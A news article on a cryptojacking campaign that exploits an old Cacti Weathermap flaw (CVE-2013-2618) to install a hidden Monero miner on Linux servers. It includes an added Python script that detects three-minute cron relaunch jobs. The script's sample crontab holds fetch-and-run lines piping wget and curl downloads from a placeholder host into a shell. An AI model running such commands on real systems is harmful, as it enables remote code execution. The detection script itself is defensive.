Cryptocurrency mining malware uses five-year-old vulnerability to mine Monero on Linux servers

Hackers are targeting accessible x86-64 Linux web servers around the world.
Written by Danny Palmer, Senior Writer


Hackers are using a five-year-old security vulnerability to infect Linux servers with cryptocurrency-mining malware.

The cryptojacking campaign exploits CVE-2013-2618, an old vulnerability in Cacti's Network Weathermap plug-in, an open source tool which is used by network administrators to visualise network activity.

Attackers can use the vulnerability to inject HTML and JavaScript into the title of maps in the network editor, as well as to upload malicious PHP code to a webserver.

The vulnerability was disclosed in April 2013 and the patch has been available for almost five years, but attackers are still using it to help mine cryptocurrency in 2018.

Uncovered by researchers at Trend Micro, the campaign is still active and is targeting publicly accessible x86-64 Linux web servers around the world, with the highest proportion of targets in Japan, Taiwan, China, and the US.

The attackers use the exploit to request a view of the code on the server, and the flaw then enables them to alter that code to install a coin miner on the system.

The process runs every three minutes, in order to ensure that if it is somehow shut down, the server will soon restart the mining process.

The miner itself is a modified XMRig tool, a legitimate, open-source Monero miner, which has been instructed to secretly perform its actions for the benefit of the attackers. Those behind it can even alter the maximum CPU usage of the miner, should they wish to lower the percentage of power used in order to reduce the chances of their activity being noticed.
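A defender-side check for the three-minute relaunch described above, as an added example that is not from the article or from Trend Micro. It assumes the relaunch is scheduled through cron (the article does not name the mechanism) and treats a download piped into a shell as the second signal; the function names, sample crontab and placeholder host are all constructed for illustration.

```python
import re

# Constructed sample crontab (not taken from the campaign); the host is a placeholder.
SAMPLE_CRONTAB = """\
MAILTO=root
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * php /var/www/html/cacti/poller.php > /dev/null 2>&1
*/3 * * * * wget -q -O - http://host.example.invalid/job | sh
0,3,6,9,12,15,18,21,24,27,30,33,36,39,42,45,48,51,54,57 * * * * curl -s http://host.example.invalid/job | bash
"""

# Assumed second signal: the command downloads something and pipes it into a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def minute_values(field):
    """Expand a cron minute field (*, n, a-b, lists, /step) into sorted minutes."""
    values = set()
    for part in field.split(","):
        rng, _, step = part.partition("/")
        if rng == "*":
            lo, hi = 0, 59
        elif "-" in rng:
            lo, hi = (int(x) for x in rng.split("-"))
        else:
            lo = hi = int(rng)
        values.update(range(lo, hi + 1, int(step) if step else 1))
    return sorted(values)

def shortest_gap(minutes):
    """Smallest gap between runs inside an hour, including the wrap to the next hour."""
    gaps = [b - a for a, b in zip(minutes, minutes[1:])]
    gaps.append(60 - minutes[-1] + minutes[0])
    return min(gaps)

def suspicious_entries(crontab_text, max_gap=3):
    """Return (gap, command) for jobs rerun every max_gap minutes or less that fetch-and-run.
    Only the minute field is examined; hour/day restrictions are ignored."""
    hits = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 5)
        if len(fields) < 6 or fields[0].startswith("#"):
            continue  # comments, blank lines, env assignments, @reboot-style macros
        try:
            gap = shortest_gap(minute_values(fields[0]))
        except (ValueError, IndexError):
            continue  # minute field is not numeric cron syntax
        if gap <= max_gap and FETCH_AND_RUN.search(fields[5]):
            hits.append((gap, fields[5]))
    return hits

if __name__ == "__main__":
    for gap, command in suspicious_entries(SAMPLE_CRONTAB):
        print(f"every {gap} min: {command}")
```

On a real host the input would be the output of `crontab -l` for each account plus the files under `/etc/cron.d`; the Cacti poller's own five-minute job in the sample is deliberately left unflagged.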


Researchers uncovered some of the wallets, and say by using these miners, one attacker has acquired 320 Monero -- which works out at just under $75,000. However, they note that is only a small proportion of what has been acquired by this campaign, which could have mined $3m worth of the cryptocurrency.

Attackers are always trying to find means of carrying out attacks, but keeping systems patched is a good way to secure them -- and while servers might be more difficult to patch than a PC, there's little reason not to have applied a five-year-old update.

Researchers also recommend that for those running Cacti's Network Weathermap plug-in, the data should be kept secure and away from public servers.

"Data from Cacti should be properly kept internal to the environment. Having this data exposed represents a huge risk in terms of operational security. While this allows systems or network administrators to conveniently monitor their environments, it also does the same for threat actors," Trend Micro researchers said in a blog post.


Cryptocurrency mining has become a popular way for cyber-crooks to earn money, with attacks successful over a long period of time because the malware remains hidden.

While increased cooling fan activity, due to a greater demand for computer power, might be noticeable in some instances, the average user isn't going to think of it as much of a concern, let alone make the link to being infected with malware.

Indeed, cryptocurrency mining has now become so popular with cybercriminals, it has become as lucrative as ransomware for hackers.
